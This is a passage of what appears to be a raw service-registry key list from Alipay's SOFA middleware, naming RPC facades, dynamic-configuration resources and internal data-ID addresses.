bc:name=com.alipay.zdal.monitor.drm.pcardsales.pcardSettleMultiDataSourceNew.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:zpaas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrisk.common.service.mng.DecisionFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypoint.api.AlipayPttransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.mng.EbillDataConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue8#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.facade.audio.AudioManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.OperationLogIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.drawndn.DrawndnInfoBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.CardAccountRefundOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.group.GroupIdentityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MONITOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.apgauss.common.service.facade.api.LabelManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctransquery.common.service.facade.api.PartnerAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlcloud.common.service.facade.api.AmlAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.camprules.CampCheckErrorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:mgw-app#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincontract.common.service.facade.p2p.service.P2pContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramAppVersionFunctions@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MarketDrmServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.CityInfoAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csbizcenter.facade.GhMenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm711#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.maxRangeCent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaycore.common.paychannelapi.api.ChannelViewQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AppQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:tailShopCategorySyncProfileHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:creditvisaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcore.api.ConnectionApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.0.158.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custprod.service.api.CardBindVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:TestExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_MOBILEBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_C_CIFPROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.storePageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuUserAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mockapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:filefactory@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitComponentWarehouseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.media.api.VideoListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.DeliveryAmountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.biz.shared.service.CampRemoteProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.adaptiveControlBizCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.facade.partner.PartnerCertManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSMKTDDS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pricemng.core.service.api.service.PricePrivScopeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimAuditMeasureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:drmManageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.feed.api.FeedQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_MABP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbprizeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.node.NodeModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.facade.OperationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.SettlementAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:finrepaycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.fx.api.PostPricingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundPurchaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetLockManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:acctransquery@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintransfercore.common.service.facade.transfer.FinTransferOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.manage.MsContentBasecateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:publichomeFCProcess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishUnitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.service.facade.service.TinyappInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetTransApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.106.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.doubleQueryCheckStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.exceptionana.ReplaysSearchTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybSignArrangementDegradeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.biz.protect.service.event.ProtectPotEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.stuff.api.ShardingDataMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerExterfaceManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.234.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_SOFA4-TEST#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerExecuteTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.MrchisCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bdsv2.facade.BdsRequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.ImportKaApplyOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAccountCloseConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.notify.api.PolicyServiceNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iscProcessRejectedBackCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.CommandRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.ClaimServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.mct.opt.MBizStrategyMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_FP_CHAT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebcore.common.facade.service.query.ContractSpecialQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaydecision.service.api.WithdrawChannelDecideService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackManagermentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqueue.client.drm72#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.innertrans.facade.api.InnerAccountDailyCutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.appx.analyse.api.AnalyseTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.instance.InstancePageListApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierBizOrderFacade:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmerchant.service.facade.MemberTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.openSellByRybCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dbackprod.service.facade.api.CancelDbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmEsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finfundprotocol-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.30.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hbzhima.settle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskmodelcenter.common.service.facade.riskentity.RmcMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@pcreditluban#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:acmantyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincoretechdss.ha.client.drm.FinCoreTechDssDrmInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.taskExecuteAlarmTimeLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcbenefitcore.facade.api.discount.BFActivityReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.admin.service.SceneParaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.244.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.realtimecheckprod.common.facade.BizSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityStatQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.BusinessTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.lawsuit.LawsuitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.allocation.AstAllocProgrammeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.finscene.api.TaskTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.schedule.StrategyContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.ClearingSettlementTimeCalcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:riskpluscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.ucdp.UcdpPositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.task.TaskCompleteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:balSubAccAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.emergency.api.ArEmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crab.protocol.tr.TrCrabService:1.0:antstall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.cds.facade.CompletenessLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductLineFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.ptcore.common.service.facade.api.cgtemplate.ConditionGroupTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileappcommon.common.service.facade.baas.FlowTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.FactorNewQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmng.biz.service.drm.DrmManageClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecisioncarina.service.client.playback.publish.CarinaTrProxyFacade:1.0:paydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.MapiExterfaceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.kof.facade.KofSeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.algo.kbknowledgegraph.common.service.facade.shopmatch.ShopMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.214.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobileha_DrillCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdQuestionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.maxShopForQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecWordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.article.ArticleQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mitemcenter.MicQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mdevsupport#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_100.83.253.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.RealNameManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.regulatory.RegulatoryReportManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.common.service.backend.api.SettleModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.creditcardfp.QueryFPService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ucdpadmin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemExtInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.rzone.FluxInvokeRService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.133.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.investBeforeHandExecDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.SwitchConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:opensupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mindv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscenter.service.contact.facade.TelPhoneInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.personloan.api.PlctransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.FinnetInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ORDER_SUCCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.punishcenter.strategy.PunishStrategyLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.serverStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.signcontract.presstest.GiftGoldApplyAccGoldArPressTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.61.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoorder.common.service.facade.api.PromoOrderRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_JINRONGYUN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:approvePdcAgreementApplySyncTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.common.script.simpleel.service.UdfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon2.common.service.facade.api.MemoMappingRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.core.identify.service.NewBizModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:servicemetadata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-operator-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.biz.trade.service.RepaymentPlanQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdac.infograph.common.service.facade.InfoGraphFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.outflux.SupergwModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.autotest.MsgAutoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.isCheckP2PMerchant,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbillingcore.common.service.facade.FeeChargeConfigManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.downgradeSprSubContractIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finriskeventseek.facade.ChangeFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.bu